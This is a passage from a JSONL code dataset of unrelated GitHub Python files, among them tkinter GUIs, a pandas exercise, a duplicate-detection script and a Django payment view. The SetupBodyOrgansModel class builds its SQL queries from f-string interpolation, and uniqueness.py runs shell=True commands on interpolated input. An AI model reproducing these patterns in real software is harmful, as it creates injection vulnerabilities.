break\n\ncolorHist('./input/TheWinterGames_highBrightness.mp4')","repo_name":"plindhorst/video-shazam","sub_path":"code/colorHistNormalization.py","file_name":"colorHistNormalization.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2264294495","text":"#!/usr/local/bin/python3\nfrom subprocess import call\nimport shlex\nprint(\"Remember to call the function in the folder! (Limited functionality of ffmpeg)\")\nfilm_path = input(\"Enter film path: \")\nsub_path = input(\"Enter sutitle path: \")\nout_name = \"'SUB_\" + film_path + \"'\"\nfilm_path = \"'\" + film_path + \"'\"\nsub_path = \"'\" + sub_path + \"'\"\nout_name = 'SUB_' + film_path\ncommand = \"ffmpeg -i \" + film_path + \" -i \" + sub_path + \" -c:v copy -c:a copy -c:s mov_text -metadata:s:s:0 language=eng \" + out_name\ncommand = shlex.split(command)\ncall(command)\n","repo_name":"nickdurante/python_collection","sub_path":"Other/add_subtitles.py","file_name":"add_subtitles.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4877209687","text":"import TCP.tcpServer as Server\nimport TCP.config as Config\nimport DbManager.mysqlManager as DbManager\n\n\ndef main():\n node__d_logger = Config.make_logger(\"nodeD\")\n\n db_manager = DbManager.MysqlManager()\n db_manager.create_tables()\n server = Server.ThreadedServerTCP(Config.localhost, Config.node_D_PORT, Config.packer_format_node_D, node__d_logger, conn_address=None,conn_port=None, db_manager=db_manager)\n server.listen()\n\n\nmain()","repo_name":"astonished12/PCD","sub_path":"HW4/nodeD.py","file_name":"nodeD.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32359554407","text":"from odoo import api, models\n\n\nclass PaymentAcquirer(models.Model):\n _inherit = \"payment.acquirer\"\n\n @api.model\n def get_allowed_acquirers(self, acquirers, invoice_id=None, order_id=None):\n \"\"\"\n Get allowed acquirers by the customer\n :param list acquirers: list of acquirers\n :param int invoice_id: invoice id\n :param int order_id: quotation id\n :return list: List of allowed acquirers\n \"\"\"\n if order_id:\n model = \"sale.order\"\n rec_id = order_id\n elif invoice_id:\n model = \"account.move\"\n rec_id = invoice_id\n else:\n return acquirers\n record = self.env[model].sudo().browse(rec_id)\n customer_acquirers = record.partner_id.allowed_acquirer_ids\n return (\n list(set(acquirers) & set(customer_acquirers))\n if customer_acquirers\n else acquirers\n )\n","repo_name":"OCA/account-payment","sub_path":"partner_restrict_payment_acquirer/models/payment_acquirer.py","file_name":"payment_acquirer.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"18"} +{"seq_id":"22630375949","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import messagebox\n\nfrom .vista_crear import VistaCrear\n\n\nclass VistaInicio(tk.Frame):\n \"\"\"\n Pantalla inicial de la interfaz. Contiene dos frames de creación de\n autómatas pudiendo pasar de uno al otro mediante un combobox\n \"\"\"\n\n def __init__(self, master, controlador, num_automatas):\n super().__init__(master)\n self.controlador = controlador\n\n frame_navegacion = tk.LabelFrame(self)\n sel_automata = tk.Label(frame_navegacion, text='Autómata:')\n self.combobox_seleccion = ttk.Combobox(frame_navegacion,\n state='readonly')\n self.combobox_seleccion['values'] = ['Autómata ' + str(i + 1) for i in\n range(num_automatas)]\n self.combobox_seleccion.set('Autómata 1')\n self.combobox_seleccion.bind(\"<>\",\n self.cambiar_automata)\n\n sel_automata.grid(row=0, column=0, padx=5, pady=5)\n self.combobox_seleccion.grid(row=0, column=1)\n\n self.boton_simular = tk.Button(frame_navegacion,\n text='Simular autómata 1',\n command=self.simular_automata)\n self.boton_simular.grid(row=0, column=3, pady=5, padx=10, sticky='e')\n boton_comparar = tk.Button(frame_navegacion, text='Comparar autómatas',\n command=self.comparar_automatas)\n boton_comparar.grid(row=0, column=2, sticky='e')\n\n frame_navegacion.grid(row=0, column=0, padx=5, pady=5, sticky='nsew')\n frame_navegacion.grid_columnconfigure(2, weight=1)\n\n separator = ttk.Separator(self, orient='horizontal')\n separator.grid(row=1, column=0, pady=10, sticky='ew')\n\n self.vistas = []\n for i in range(num_automatas):\n self.vistas.append(VistaCrear(self, controlador, i))\n self.vista_actual = 0\n\n self.vistas[self.vista_actual].grid(row=2, column=0, sticky='nsew')\n\n self.grid_columnconfigure(0, weight=1)\n self.grid_rowconfigure(2, weight=1)\n\n def set_controlador(self, controlador):\n self.controlador = controlador\n self.vistas[0].set_controlador(controlador)\n self.vistas[1].set_controlador(controlador)\n\n def cambiar_automata(self, event):\n \"\"\"\n Cambia la vista entre los dos posibles autómatas a crear\n :param event:\n :return:\n \"\"\"\n if self.combobox_seleccion.get() == 'Autómata 1':\n self.vista_actual = 0\n self.boton_simular.configure(text='Simular autómata 1')\n else:\n self.vista_actual = 1\n self.boton_simular.configure(text='Simular autómata 2')\n\n self.vistas[(self.vista_actual + 1) % 2].grid_forget()\n self.vistas[self.vista_actual].grid(row=2, column=0, sticky='nsew')\n\n def simular_automata(self):\n \"\"\"\n Transmite al controlador que ha sido pulsado el botón simular si el\n autómata introducido es correcto\n :return:\n \"\"\"\n try:\n s_init = self.vistas[self.vista_actual].get_s_init()\n simbolo, matriz = self.vistas[\n self.vista_actual].get_transformacion()\n observable = self.vistas[self.vista_actual].get_observable()\n except SyntaxError:\n messagebox.showerror(message='Errores de sintaxis en el autómata')\n else:\n correcto = self.controlador.simular_automata(s_init, observable,\n simbolo, matriz,\n self.vista_actual)\n if not correcto:\n messagebox.showerror(message='El autómata no es correcto')\n\n def comparar_automatas(self):\n \"\"\"\n Transmite al controlador que ha sido pulsado el botón comparar si los\n dos autómatas de las vistas son correctos\n :return:\n \"\"\"\n try:\n s_init = self.vistas[0].get_s_init()\n simbolo, matriz = self.vistas[0].get_transformacion()\n observable = self.vistas[0].get_observable()\n\n s_init_2 = self.vistas[1].get_s_init()\n simbolo_2, matriz_2 = self.vistas[1].get_transformacion()\n observable_2 = self.vistas[1].get_observable()\n except SyntaxError:\n messagebox.showerror(\n message='Errores de sintaxis en alguno de los autómatas')\n else:\n correcto = self.controlador.comparar_automatas(s_init, simbolo,\n matriz, observable,\n s_init_2, simbolo_2,\n matriz_2,\n observable_2)\n if not correcto:\n messagebox.showerror(\n message='Los autómatas deben ser dos MOQFA correctos y tener el mismo alfabeto')\n\n def actualizar_automata(self, id_qfa, dim=None, tipo=None, s_init=None,\n simbolo=None, transformacion=None,\n observable=None, alfabeto=None):\n self.vistas[id_qfa].mostrar_automata(dim, tipo, s_init, simbolo,\n transformacion, observable,\n alfabeto)\n","repo_name":"javiegal/Simulador-QFA","sub_path":"vista/vista_inicio.py","file_name":"vista_inicio.py","file_ext":"py","file_size_in_byte":5526,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15536410000","text":"from tkinter import *\nfrom tkinter import ttk\n\nroot = Tk()\n\nname = Label(root, text = \"name: \")\nname.grid(row = 1, column = 1)\n\nnamebox = Entry(root)\nnamebox.grid(row = 1, column = 2, padx = 7)\n\nsex = Label(root, text = \"sex: \")\nsex.grid(row = 2, column = 1)\n\nsexframe = Frame(root)\nsexframe.grid(row = 2, column = 2, padx = 5, pady = 5)\n\nvarSex = IntVar()\nmalebutton = Radiobutton(sexframe, text = \"male\", variable = varSex, value = 1)\nfemalebutton = Radiobutton(sexframe, text = \"female\", variable = varSex, value = 0)\nmalebutton.grid(row = 1, column = 1)\nfemalebutton.grid(row = 1, column = 2)\n\nbirthday = Label(root, text = \"birthday: \" )\nbirthday.grid(row=3, column=1)\nbirthdayframe = Frame(root)\nbirthdayframe.grid(row = 3, column = 2)\n\nvarYear = IntVar()\nyear = ttk.Combobox(birthdayframe, textvariable = varYear, state = 'readonly', width = 4)\nyear['value'] = list(range(2017, 1900, -1))\nyear.set(\"년\")\nyear.grid(row = 1, column = 1)\n\nvarMonth = IntVar()\nmonth = ttk.Combobox(birthdayframe, textvariable = varMonth, state = 'readonly', width = 2)\nmonth['value'] = list(range(1, 13))\nmonth.set(\"월\")\nmonth.grid(row = 1, column = 3)\n\n\nvarDay = IntVar()\nday = ttk.Combobox(birthdayframe, textvariable = varDay, state = 'readonly', width = 2)\nday['value'] = list(range(1, 32))\nday.set(\"월\")\nday.grid(row = 1, column = 5)\n\nyearlabel = Label(birthdayframe, text= '년')\nyearlabel.grid(row = 1, column=2)\nmonthlabel = Label(birthdayframe, text= '월')\nmonthlabel.grid(row = 1, column=4)\ndaylabel = Label(birthdayframe, text= '일')\ndaylabel.grid(row = 1, column=6)\n\nemail = Label(root, text = \"Email\")\nemail.grid(row = 4, column = 1)\n\nemailAddress = Entry(root)\nemailAddress.grid(row = 4, column = 2, padx = 7)\n\nat = Label(root, text = \"@\")\nat.grid(row = 4, column = 3)\n\ndomain = Entry(root)\ndomain.grid(row = 4, column = 4, padx = 7)\n\nlanguage = Label(root)\nlanguage.grid(row = 5, column = 1)\n\nlanguageframe = Frame(root)\nlanguageframe.grid(row = 5, column = 2)\n\n\n\n\n\nroot.mainloop()\n","repo_name":"wonkim0512/BDP","sub_path":"lectures/new/20more.py","file_name":"20more.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74195414120","text":"from functools import reduce\nimport fileinput\n\n\ndef process_position(grid, x, y):\n position_type = grid[x][y]\n if position_type == '.':\n return '.'\n # part 1\n # neighbours = [grid[i][j] for i in range(max(0, x-1), min(len(grid), x+2))\n # for j in range(max(0, y-1), min(len(grid[0]), y+2)) if i != x or j != y]\n\n # part 2\n neighbours = []\n steppers = {\n 'l': lambda i, j: (i, j-1),\n 'r': lambda i, j: (i, j+1),\n 'u': lambda i, j: (i+1, j),\n 'd': lambda i, j: (i-1, j),\n 'ur': lambda i, j: (i+1, j+1),\n 'ul': lambda i, j: (i+1, j-1),\n 'dr': lambda i, j: (i-1, j+1),\n 'dl': lambda i, j: (i-1, j-1)\n }\n for d in steppers.values():\n pos_x, pos_y = d(x, y)\n while (0 <= pos_x < len(grid)) and (0 <= pos_y < len(grid[0])):\n if grid[pos_x][pos_y] != '.':\n neighbours.append(grid[pos_x][pos_y])\n break\n else:\n pos_x, pos_y = d(pos_x, pos_y)\n occupied_neighbours = reduce(\n lambda acc, curr: acc+1 if curr == '#' else acc, neighbours, 0)\n if position_type == 'L':\n return 'L' if occupied_neighbours > 0 else '#'\n if position_type == '#':\n # part 1\n # return '#' if occupied_neighbours < 4 else 'L'\n\n # part 2\n return '#' if occupied_neighbours < 5 else 'L'\n\n\ndef are_grids_equal(grid_1, grid_2):\n return all(map(lambda i: grid_1[i] == grid_2[i], range(len(grid_1))))\n\n\ndef simulate_step(grid):\n grid_height = len(grid)\n grid_width = len(grid[0])\n new_grid = list(map(lambda _: [''] * grid_width, [''] * grid_height))\n for i, row in enumerate(grid):\n for j, col in enumerate(row):\n new_grid[i][j] = process_position(grid, i, j)\n return new_grid\n\n\ndef count_occupied(grid):\n cnt = 0\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == '#':\n cnt += 1\n return cnt\n\n\ngrid = list(map(lambda x: list(x.rstrip()), fileinput.input()))\nwhile True:\n new_grid = simulate_step(grid)\n if are_grids_equal(grid, new_grid):\n print(count_occupied(grid))\n break\n else:\n grid = new_grid\n","repo_name":"jakipatryk/aoc-2020","sub_path":"11/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7988087860","text":"\"\"\"\r\nAnalyse duplicates in a dataset.\r\nConsider near and exact matching.\r\n\"\"\"\r\nimport sys\r\nimport csv\r\nimport ast\r\nimport gzip\r\nimport subprocess\r\nimport pandas as pd\r\nfrom dq_analysis.datasets.data import Data\r\nfrom ast import literal_eval\r\n\r\nif len(sys.argv) < 2:\r\n print(\"Usage: python dq_analysis/attributes/uniqueness.py [prepare/measure] \")\r\n exit()\r\n\r\n\r\ndef identify_duplicates(dataset):\r\n \"\"\"\r\n Identify near duplicates using the duplicate code detector tool\r\n from Allamanis (2018)\r\n\r\n IMPORTANT: Requires tokens to be generated first via currency preparation\r\n \"\"\"\r\n\r\n csv.field_size_limit(100000000)\r\n headers = []\r\n data = []\r\n\r\n # Process tokenized files\r\n for row in csv.reader(open(f'dq_analysis/datasets/{dataset}/tokens.csv')):\r\n if not headers:\r\n headers = row\r\n else:\r\n entries = [a[0] for a in ast.literal_eval(row[3])]\r\n data.append( [row[1], entries])\r\n df = pd.DataFrame(data, columns=['filename','tokens'])\r\n\r\n # Output in JSONL format\r\n df.to_json(f'dq_analysis/datasets/{dataset}/tokens.jsonl', orient='records', lines=True)\r\n # Output in GZIP format\r\n with open(f'dq_analysis/datasets/{dataset}/tokens.jsonl', 'rb') as src, gzip.open(f'dq_analysis/datasets/{dataset}/tokens.jsonl.gz', 'wb') as dst:\r\n dst.writelines(src)\r\n\r\n # Run duplicate detector tool\r\n p = subprocess.Popen(f\"dotnet run DuplicateCodeDetector.csproj --dir=../../dq_analysis/datasets/{dataset}/tokens.jsonl.gz\",\r\n cwd='near-duplicate-code-detector/DuplicateCodeDetector/', shell=True)\r\n p.wait()\r\n\r\n # Move the output\r\n p = subprocess.Popen(f\"mv near-duplicate-code-detector/DuplicateCodeDetector/DuplicateCodeDetector.csproj.json dq_analysis/datasets/{dataset}/unique_clusters.csv\", shell=True)\r\n p.wait()\r\n\r\n\r\ndef get_duplicate_clusters(dataset, type=3):\r\n \"\"\"\r\n Return the within-class fuzzy duplicates of a dataset,\r\n using similarity matching.\r\n \"\"\"\r\n\r\n # Load the data\r\n data = Data(dataset).get_dataset()\r\n vuln = data[data.Vulnerable == 1].UID.tolist()\r\n nonvuln = data[data.Vulnerable == 0].UID.tolist()\r\n\r\n # Read near duplicate matching output\r\n if type == 1:\r\n duplicates = open(f'dq_analysis/datasets/{dataset}/consistent_clusters.csv')\r\n clusters = literal_eval(duplicates.read())\r\n elif type == 3:\r\n duplicates = open(f'dq_analysis/datasets/{dataset}/unique_clusters.csv')\r\n clusters = literal_eval(duplicates.read())\r\n class_clusters = []\r\n # Split clusters by class\r\n for x in clusters:\r\n cluster0, cluster1 = [], []\r\n for id in x:\r\n if int(id) in nonvuln:\r\n cluster0.append(int(id))\r\n if int(id) in vuln:\r\n cluster1.append(int(id))\r\n if len(cluster0) > 1:\r\n class_clusters.append(cluster0)\r\n if len(cluster1) > 1:\r\n class_clusters.append(cluster1)\r\n return class_clusters\r\n\r\n\r\ndef count_near_unique(dataset, type):\r\n \"\"\"\r\n Count number of unique files using near duplicate matching,\r\n performed using the Jacquard Index and implemented via Allamanis (2018)\r\n \"\"\"\r\n print('-'*3 + dataset + ' Type ' + str(type) + '-'*3)\r\n df = Data(dataset).get_dataset()\r\n # Get duplicates\r\n class_clusters = get_duplicate_clusters(dataset, type)\r\n duplicates = [int(y) for x in class_clusters for y in x[1:]]\r\n # Get unique\r\n unique = df[~df.UID.isin(duplicates)]\r\n unique = unique.dropna()\r\n num_unique = len(unique)\r\n\r\n print(f\"NEAR unique: {num_unique} / {len(df)}\")\r\n print(f\"{dataset} Uniqueness = {num_unique / len(df)}\")\r\n\r\n\r\nif __name__ == '__main__':\r\n if sys.argv[1] == 'prepare':\r\n identify_duplicates(sys.argv[2])\r\n elif sys.argv[1] == 'measure':\r\n count_near_unique(sys.argv[2])\r\n else:\r\n print(f\"ERROR: Unknown command line argument: \\\"{sys.argv[1]}\\\"\")\r\n","repo_name":"RolandCroft/Software-Vulnerability-Data-Quality","sub_path":"dq_analysis/attributes/uniqueness.py","file_name":"uniqueness.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"3250602437","text":"from database.db import get_connection\nfrom .entities.SetupBodyOrgans import SetupBodyOrgans\n\nclass SetupBodyOrgansModel():\n\n @classmethod\n def get_SetupBodyOrgans(self):\n try:\n connection = get_connection()\n setupbodyorgans = []\n\n with connection.cursor() as cursor:\n textSQL = \"\"\"\n SELECT idsetupbodyorgans, setupbodyorgans.idsetupsystems, setupsystems.setupsystems, bodyorgans, \"Left\", \"Right\", \n men, womman, setupbodyorgans.rangemax, setupbodyorgans.rangemin, setupbodyorgans.lenguage, setupbodyorgans.importance_level\n FROM setupbodyorgans\n LEFT JOIN setupsystems on setupsystems.idsetupsystems = setupbodyorgans.idsetupsystems;\n \"\"\"\n cursor.execute(textSQL)\n resultset = cursor.fetchall()\n\n for row in resultset:\n setupbodyorgansx = SetupBodyOrgans(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9], row[10], row[11])\n setupbodyorgans.append(setupbodyorgansx.to_JSON())\n\n connection.close()\n return setupbodyorgans\n\n except Exception as ex:\n raise Exception(ex)\n \n @classmethod\n def get_SetupBodyOrgan(self, id):\n try:\n connection = get_connection()\n\n with connection.cursor() as cursor:\n textSQL = f\"\"\"\n SELECT idsetupbodyorgans, idsetupsystems, bodyorgans, \"Left\", \"Right\", \n men, womman, rangemax, rangemin, lenguage\n\t FROM setupbodyorgans\n WHERE idsetupbodyorgans = {id};\n \"\"\"\n cursor.execute(textSQL)\n row = cursor.fetchone()\n setupbodyorgans = None\n\n if row != None:\n setupbodyorgansx = SetupBodyOrgans(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9])\n setupbodyorgans = setupbodyorgansx.to_JSON()\n\n connection.close()\n return setupbodyorgans\n\n except Exception as ex:\n raise Exception(ex)\n \n @classmethod\n def add_SetupBodyOrgan(self, IDSetupBodyOrgans, IDSetupSystems, BodyOrgans, Left, Right, Men, Womman, RangeMax, RangeMin, Lenguage, importance_level):\n try:\n connection = get_connection()\n\n with connection.cursor() as cursor:\n textSQL = f\"\"\"\n INSERT INTO setupbodyorgans(\n idsetupbodyorgans, idsetupsystems, bodyorgans, \"Left\", \"Right\", \n men, womman, rangemax, rangemin, lenguage, importance_level)\n VALUES ({IDSetupBodyOrgans}, {IDSetupSystems}, '{BodyOrgans}', CAST({Left} AS bit), CAST({Right} AS bit), \n CAST({Men} AS bit), CAST({Womman} AS bit), {RangeMax}, {RangeMin}, '{Lenguage}', '{importance_level}');\n \"\"\"\n cursor.execute(textSQL)\n affected_rows = cursor.rowcount\n connection.commit()\n connection.close()\n return affected_rows\n except Exception as ex:\n raise Exception(ex)\n \n @classmethod\n def update_SetupBodyOrgan(self, IDSetupBodyOrgans, IDSetupSystems, BodyOrgans, Left, Right, Men, Womman, RangeMax, RangeMin, Lenguage, importance_level):\n try:\n connection = get_connection()\n\n with connection.cursor() as cursor:\n textSQL = f\"\"\"\n UPDATE setupbodyorgans\n SET idsetupsystems={IDSetupSystems}, bodyorgans='{BodyOrgans}', \"Left\"=CAST({Left} AS bit), \"Right\"=CAST({Right} AS bit), \n men=CAST({Men} AS bit), womman=CAST({Womman} AS bit), rangemax={RangeMax}, rangemin={RangeMin}, lenguage='{Lenguage}', importance_level='{importance_level}'\n WHERE idsetupbodyorgans = {IDSetupBodyOrgans};\n \"\"\"\n cursor.execute(textSQL)\n affected_rows = cursor.rowcount\n connection.commit()\n connection.close()\n return affected_rows\n except Exception as ex:\n raise Exception(ex)","repo_name":"MiguelCarcamo/IridologyApiRest","sub_path":"models/SetupBodyOrgansModel.py","file_name":"SetupBodyOrgansModel.py","file_ext":"py","file_size_in_byte":4319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"32499324698","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 13 18:53:21 2020\n\n@author: lthompson8\n\"\"\"\n\n#%%\n#1. Use Pandas to repeat the Exercise 5.7.\n#Hint 1: Use pd.read_csv(url, ...) to read the USGS online gauge data.\n\nimport pandas as pd\nimport os\n\nurl = \"https://waterdata.usgs.gov/nwis/dv?&cb_00060=on&format=rdb&site_no=06803495&site_no=06803486&referred_module=sw&period=&begin_date=2000-10-01&end_date=2019-09-30\"\n#df = pd.read_csv(url, skiprows=range(0,28), sep='\\n')\ndf = pd.read_csv(url, skiprows=29, delimiter='\\t', header=0, names=['org','gage','date','flow','estimate'])\nprint(df)\ndirPath = r'C:\\Users\\lthompson8\\python2020summer\\LauraThompson\\Exercise7'\nfileName = 'USGS_Streamflow_Data.csv'\nfullPath = os.path.join(dirPath, fileName)\nprint(fullPath)\n\ndf.to_csv(fullPath, index=False)\n#Hint 2: Use df.set_index() to set the datetime column and df.resample() to calculate the monthly and annual statistics\n\ndf['date']= pd.to_datetime(df['date'], errors='coerce')\nprint(df)\ndf.info()\ndf = df.set_index(['date'])\n\n#change flow to numeric type\ndf['flow'] = pd.to_numeric(df['flow'], errors='coerce')\ndf.info()\n\n#create empty dataframe for monthly stats to go into\nMonthlyStats = pd.DataFrame(columns=['Min','Max','Mean'])\nprint(MonthlyStats)\n#put data in! \"M\" resamples by Month\n#use following code if you want to go across both gages.\n#MonthlyStats.Min = df.flow.resample('M').min()\n#MonthlyStats.Max = df.flow.resample('M').max()\n#MonthlyStats.Mean = df.flow.resample('M').mean()\n\n#can also do this by gage if desired using code below, but instructions seem like we should average across gages.\ndf['gage'] = pd.to_numeric(df['gage'], errors='coerce')\nMonthlyStats.Min = df.flow.groupby(df['gage']).resample('M').min()\nMonthlyStats.Max = df.flow.groupby(df['gage']).resample('M').max()\nMonthlyStats.Mean = df.flow.groupby(df['gage']).resample('M').mean()\n\n\nfileName = 'MonthlyStreamflowStats.csv'\nfullPath = os.path.join(dirPath, fileName)\nprint(fullPath)\nMonthlyStats.to_csv(fullPath, float_format='%.2f')\n#4) calculate the average annual runoff of each gage (expressed in acre-feet)\n#Hint 7: for the average annual runoff, you need to calculate the total runoff for each year and then calculate average of these annual runoff.\n#create empty dataframe for yearly total\nYearlyTotal = pd.DataFrame(columns=['AcreFeet'])\n#convert to acre-feet\ndf['AcreFeetPerDay'] = df['flow']*1.98347\n#resample by year with \"Y\" and include groupby to create separate for each gage.\n\ndf['gage'] = pd.to_numeric(df['gage'], errors='coerce')\ndf.info()\nYearlyTotal.AcreFeet = df.AcreFeetPerDay.groupby(df['gage']).resample('Y').sum()\nYearlyTotal\n \nfileName = 'AnnualAcreFeet.csv'\nfullPath = os.path.join(dirPath, fileName)\nprint(fullPath)\nYearlyTotal.to_csv(fullPath, float_format='%.2f')\n\n\n#%%\n#2. Use Pandas to:\n#2.1 Read data in data/users.zip (using Pandas' the on-the-fly decompression cabability)\nimport pandas as pd\nimport os\nuserdata = pd.read_csv('C:/Users/lthompson8/python2020summer/LauraThompson/users.zip', sep='|')\nuserdata = userdata.set_index('user_id')\nuserdata.info()\nprint(userdata)\n#2.2 Identify all the occupations and compare the user numbers between STEM-related occupations and non-STEM occupations.\n#first idenfity the occupations that are considered STEM.\n#view all occupations with pivot table\nuserdata.pivot_table(index='occupation', aggfunc=['min','max','mean','std'])\n\n#for total number of stem careers:\nstem_careers = ('engineer', \"programmer\", \"scientist\", \"technician\", \"doctor\")\nprint(stem_careers)\n # create empty stem total list\nstem_careers_total = 0\nfor item in stem_careers:\n num = len(userdata[userdata[\"occupation\"] == item])\n print(f'{item} = {num}')\n stem_careers_total += num\n\n#for total number of non-stem careers:\nnon_stem_careers = ('administrator', 'artist', 'educator', 'entertainment', 'executive', 'healthcare', 'homemaker', 'lawyer', 'librarian', 'marketing', 'none', 'other', 'retired', 'salesman', 'student', 'writer')\nnon_stem_careers_total = 0\nfor item in non_stem_careers:\n num = len(userdata[userdata[\"occupation\"] == item])\n print(f'{item} = {num}')\n non_stem_careers_total += num\n\n#to get total remaining careers (across career), will sum the total number of users, then subtract the non stem\ntotalall = len(userdata.index)\n\nprint('Total users is = ', totalall)\nprint('Total STEM users is = ', stem_careers_total)\nprint('Total non-STEM users is = ', non_stem_careers_total)\n\n#2.3 Identify the locations of the users that are programmers and above 35. \nuserdata.info()\nprogrammers = userdata.query('occupation == \"programmer\"')\nprogrammersunder35 = programmers.query('age < 35')\nprogrammersunder35location = (programmersunder35.zip_code)\nprint(f\"zip code locations of programmers under 35 = {programmersunder35location}\")\nyoungprogrammerslocation = userdata.query('occupation == \"programmer\" & age < 35').groupby(['zip_code'])['zip_code'].count()\nprint(youngprogrammerslocation)\n\n#2.4 How many male and female programmers, respectively? \nprogrammergender = programmers.query('occupation == \"programmer\"').groupby(programmers['gender']).count()\nprint(programmergender)\nmaleprogrammers = programmergender['gender']['M']\nfemaleprogrammers = programmergender['gender']['F']\nprint(f\"The number of male programmers is {maleprogrammers} and number of female programmers is {femaleprogrammers}\")\n\n#2.5 Is this ratio the same for the age under 35?\n#split previous by under 35 and greater or equal to 35.\nprint(programmers)\nprogrammers.info()\nyoungprogrammers = programmers.query('occupation == \"programmer\" & age < 35').groupby(programmers['gender']).count()\nyoungmaleprogrammers = youngprogrammers['gender']['M']\nyoungfemaleprogrammers = youngprogrammers['gender']['F']\nprint(f\"The number of male programmers under 35 is {youngmaleprogrammers} and the number of female programmers under 35 is {youngfemaleprogrammers}.\")\nratioyoungprogrammers = f'{youngmaleprogrammers/youngfemaleprogrammers:.2f}'\nprint(f\"The ratio of male to female programmers in the under 35 group is {ratioyoungprogrammers}.\")\n\nolderprogrammersgender = programmers.query('age >= 35').groupby(programmers['gender']).count()\noldermaleprogrammers = olderprogrammersgender['gender']['M']\nolderfemaleprogrammers = olderprogrammersgender['gender']['F']\nprint(f\"The number of male programmers over 35 is {oldermaleprogrammers} and the number of female programmers over 35 is {olderfemaleprogrammers}.\")\nratioolderprogrammers = f'{oldermaleprogrammers/olderfemaleprogrammers:.2f}'\nprint(f\"The ratio of male to female programmers in the 35 and over group is {ratioolderprogrammers}.\")\n\n#2.6 Compare the numbers of male and female for each occupations\noccupationstatsbygender = userdata.groupby(['occupation', 'gender'])['gender'].count()\nprint(occupationstatsbygender)\n\n#2.7 Find the occupations with the youngest and oldest mean ages, respectively\n\n#find mean ages first\nmeanages = userdata.groupby(['occupation'])['age'].mean()\n#sort\nprint(meanages.sort_values().round(decimals=2))\n#find youngest\nyoungestoccupation = meanages.idxmin()\nprint(f'{youngestoccupation} is the occupation with the youngest mean age with a mean age of {meanages.min():.1f} years')\n#find oldest\noldestoccupation = meanages.idxmax()\nprint(f'{oldestoccupation} is the occupation with the youngest mean age with a mean age of {meanages.max():.1f} years')\n\n#2.8 Based on the first two digits of the zip codes, find the area with the largest number of users\n#shorten zipcode \nuserdata['shortzip'] = userdata['zip_code'].str[:2]\nuserdata.info()\nusersbyregion = userdata.groupby(['shortzip'])['occupation'].count()\nmaxuserszip = usersbyregion.idxmax()\nprint(f\"The largest number of users is in the zip code prefix {maxuserszip}.\")\n\n\n\n#userdata.pivot_table(values='age', index='occupation', columns='gender', aggfunc=['min','max','mean','std'])\n","repo_name":"ougx/python2020summer","sub_path":"LauraThompson/Exercise7/Exercise7PandaBasics.py","file_name":"Exercise7PandaBasics.py","file_ext":"py","file_size_in_byte":7840,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"42"} +{"seq_id":"30928781654","text":"# -*- coding:utf-8 -*-\nimport textwrap\nfrom pyboleto.pdf import BoletoPDF\n\nfrom django.conf import settings\nfrom django.http import HttpResponse\nfrom django.utils.formats import date_format\nfrom django.utils.timezone import now\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.views import generic\n\nfrom payments import models\nfrom payments.billet import BoletoCaixa\nfrom utils.views import LoginRequiredMixin\n\n\nclass ManagedPaymentsMixin(object):\n \"\"\"\n A Mixin that offers a list of payments whose the logged in user is manager.\n \"\"\"\n def get_queryset(self):\n return models.Payment.objects.filter(\n contract__pk=self.kwargs['contract_pk']).order_by('-due_date')\n\n\nclass PaymentListView(LoginRequiredMixin, ManagedPaymentsMixin, generic.ListView):\n paginate_by = 12\n template_name = 'payments/payment_list.html'\n\n\nclass PaymentDetailView(generic.DetailView):\n \"\"\"Shows detailed information about the Payment before print the billet.\"\"\"\n model = models.Payment\n\n def get_context_data(self, **kwargs):\n context = super(PaymentDetailView, self).get_context_data(**kwargs)\n if not self.request.user.is_staff:\n self.object.visit_set.create() # register how many visits\n return context\n\n def get_template_names(self):\n if self.request.user.is_authenticated():\n return ['payments/billing.html', ]\n else:\n return ['payments/billing_not_logged.html', ]\n\n\ndef print_payment(request, pk):\n \"\"\"Generates the billet for payment as PDF for printing.\"\"\"\n payment = models.Payment.objects.get(pk=pk)\n client = payment.contract.client\n\n # Set billet mainiti's data\n billet = BoletoCaixa()\n billet.carteira = settings.CEDENTE_CARTEIRA\n billet.conta_cedente = settings.CEDENTE_CONTA\n billet.agencia_cedente = settings.CEDENTE_AGENCIA\n billet.cedente = settings.CEDENTE\n billet.cedente_documento = settings.CEDENTE_DOCUMENTO\n billet.cedente_cidade = settings.CEDENTE_CIDADE\n billet.cedente_uf = settings.CEDENTE_UF\n billet.cedente_logradouro = settings.CEDENTE_LOGRADOURO\n billet.cedente_bairro = settings.CEDENTE_BAIRRO\n billet.cedente_cep = settings.CEDENTE_CEP\n\n # Set billet instructions\n billet.demonstrativo = textwrap.wrap(unicode(payment), 90)\n instructions = _('Do not accept payment after due date.')\n billet.instrucoes = textwrap.wrap(instructions, 90)\n\n # Set billet client's data\n billet.data_documento = now()\n billet.data_processamento = now()\n billet.data_documento = now()\n billet.data_vencimento = payment.due_date\n billet.nosso_numero = str(payment.id)\n billet.numero_documento = str(payment.id)\n billet.valor = payment.cost\n billet.valor_documento 